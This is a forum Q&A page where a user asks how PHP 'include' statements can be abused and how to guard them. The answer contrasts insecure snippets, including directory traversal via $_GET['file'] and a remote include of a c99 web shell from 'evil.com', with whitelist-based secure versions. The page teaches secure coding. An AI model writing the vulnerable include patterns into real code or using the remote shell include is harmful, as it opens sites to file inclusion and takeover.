Home/ Questions/Q 7788911
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-01T21:07:42+00:00

I’m using the include function (e.x. include ‘header2.php’ or include ‘class.users.php’) to add the

  • 0

I’m using the “include” function (e.x. “include ‘header2.php'” or “include ‘class.users.php'”)
to add the header or session class in my website. I don’t really remember where, but I heard that hackers abuse, somehow, this “include” thing, sending the fake included page or something like that.
So basically I would like to know what’s with that “include” function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.

Thanks in advance.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    It all depends on how you implement it. If you specifically set the path, then it’s secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

    Insecure (Directory Traversal)

    <?php 
include($_GET['file']);
?>

    Insecure (URL fopen – If enabled)

    <?php 
include('http://evil.com/c99shell.php');
?>

    Insecure

    <?php 
include('./some_dir/' . $_GET['file']);
?>

    Partially Insecure ( *.php files are vulnerable )

    <?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

    Secure (Though not sure why anyone would do this.)

    <?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

    Secure

    <?php 
include('./includes/somefile.php');
?>
    • 0